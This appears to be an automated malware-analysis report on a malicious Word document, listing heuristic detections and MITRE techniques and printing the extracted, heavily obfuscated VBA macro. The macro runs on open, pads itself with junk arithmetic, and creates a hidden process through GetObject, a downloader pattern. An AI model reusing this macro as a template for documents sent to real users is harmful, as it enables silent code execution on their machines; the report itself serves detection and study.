MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing a VBA macro. The macro utilizes the AutoOpen function and the GetObject call, which are common indicators of malicious activity. The presence of these elements strongly suggests an attempt to execute arbitrary code, likely to download and run a secondary payload.
Heuristics 7
-
ClamAV: Doc.Malware.00536d-6904394-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.00536d-6904394-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11061 bytes |
SHA-256: 50b036633bae3345acecdcf08bf5d6114bedceaa379dbf2c083953087fdf5a5e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "iQAoZAAQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ToBQAQAU"
Attribute VB_Base = "0{51E7B197-7237-49D0-8E12-9D4F33F51C38}{C1FE6852-1F98-4CBC-AA30-83EF6529269E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "F_AwBA"
Sub autoopen()
On Error Resume Next
If bUAGoZB = RAG1DoA Then
JACAxk = (710457559)
cA1AA_ = (wAkQxUA * Log(234176360 + Atn(265125248 * RABwQk)) + XUGkCAAx + CDbl(BQXXAC - Sqr(WAGQBAB / CBool(403487077 / 790890056) + rQwkQGoA - Rnd(BUDDXw))) * 764328624 * 109473798)
vUkGAwC = (119548777)
End If
If JA1cQAk = RADDAAAk Then
oDUBAQQw = (756835792)
TXAAwU = (bQZA_kQ * Log(563522477 + Atn(897508302 * wAGGCA_A)) + zADxBC + CDbl(WZAQQU - Sqr(wwUAwA / CBool(730548565 / 937442634) + kQkBQc - Rnd(bUkkAX))) * 182487739 * 545345512)
TAACUGUw = (719535755)
End If
Set cxkADA = GetObject(EAA1ADA + ToBQAQAU.TkBGQ4D + YA4XBkAA)
If H1xQcGA = PAUAUkQ1 Then
SkAB_B = (285702528)
z4DA_xQ = (r1k1AAA * Log(626390355 + Atn(149629213 * FQBcZkDU)) + wUxwAAC + CDbl(BCAA_xAD - Sqr(bBUBAUw / CBool(764558718 / 378496997) + jAABAB - Rnd(vBDQwU))) * 951609534 * 772194350)
z4ADAXU = (246719815)
End If
If jABcAX = AAAAAwo_ Then
R4oQAo = (665634783)
uDDcABD = (IAAkoB * Log(762470668 + Atn(212658891 * tAoCAk)) + NDDCADG + CDbl(hBcDQcA - Sqr(DwUAQxDD / CBool(215923357 / 76587700) + jBAAkkA - Rnd(kAo_kDQw))) * 332239278 * 433924401)
CAQoXAA = (600683028)
End If
If ZA_Dc1A = CQAxAAZA Then
KBDUAA = (768959014)
IAAc1B = (VCQGQA * Log(511043833 + Atn(158982383 * wGACUAB)) + VAADwUAU + CDbl(d4_UQDU - Sqr(hUBBAAQ / CBool(201061409 / 447957769) + Zk_A_AQB - Rnd(mQxA_o))) * 509950142 * 283120311)
AwUXABDB = (347885851)
End If
cxkADA.ShowWindow = 796713 - 796713
If dAAk1k = YDAZABxU Then
DZA_cCCQ = (400346871)
hAZUQAQ = (UBAAAZ1o * Log(795585158 + Atn(889226940 * p4BCDD)) + KQUZAAAB + CDbl(jZUwZZB4 - Sqr(hAAZXUo / CBool(554761292 / 643721005) + pABB4B - Rnd(q4_AAwAQ))) * 559988833 * 87661382)
nwAAAA = (195148856)
End If
If WXGUZD = IACcAB1 Then
wDxX_AAU = (321982358)
rCAo4DGX = (VZADCB * Log(801773299 + Atn(23713028 * FAA1ow)) + BZcXCUAw + CDbl(TUoDBA - Sqr(jkQ1DDQ / CBool(28398717 / 577525272) + BxUDUXAx - Rnd(jAADAAA))) * 226843297 * 7688389)
lAQBAAk = (629637192)
End If
GetObject(TXAAoXBA + ToBQAQAU.QBZDAZG + lUAoXwB). _
Create@ s1_1DUB + ToBQAQAU.aAAABC + WBGBxBwA + ToBQAQAU.P4A4AG + R_GAXG + ToBQAQAU.PDGQ1Gw + JocAwo, hAo1A1, cxkADA, LAcoGX
If zXcQGQD = wZA_QQG Then
hxAwUZG = (570384162)
F1AQUA = (M4wDUAA * Log(407835625 + Atn(304222552 * SB4AQAA)) + Y_oDAAAD + CDbl(RwGAAXUQ - Sqr(Y1XGcGA / CBool(488489582 / 230218335) + iZDAQU - Rnd(CkGBDAD))) * 682638485 * 314394870)
UUAA1X1X = (106574424)
End If
If qCXGGU = wDAUGQB Then
zGD4Bk = (932955277)
t_GUxA_G = (YABwAAxQ * Log(493076800 + Atn(720779727 * UUZxA_)) + qABUQ_o1 + CDbl(MxABAxU - Sqr(sBBADCGA / CBool(252109750 / 189680532) + zDQAX4 - Rnd(soAXC_AA))) * 548380720 * 474016275)
JUUAABX = (745664000)
End If
End Sub
' Processing file: /opt/analyzer/scan_staging/bd0cdd2ef6624ef2b9826170024317bb.bin
' ===============================================================================
' Module streams:
' Macros/VBA/iQAoZAAQ - 1106 bytes
' Macros/VBA/ToBQAQAU - 1158 bytes
' Macros/VBA/F_AwBA - 5308 bytes
' Line #0:
' FuncDefn (Sub F_AwBA())
' Line #1:
' OnError (Resume Next)
' Line #2:
' Ld autoopen
' Ld bUAGoZB
' Eq
' IfBlock
' Line #3:
' LitDI4 0xB8D7 0x2A58
' Paren
' St RAG1DoA
' Line #4:
' Ld cA1AA_
' LitDI4 0x3F68 0x0DF5
' LitDI4 0x7D80 0x0FCD
' Ld wAkQxUA
' Mul
' ArgsLd Atn 0x0001
' Add
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.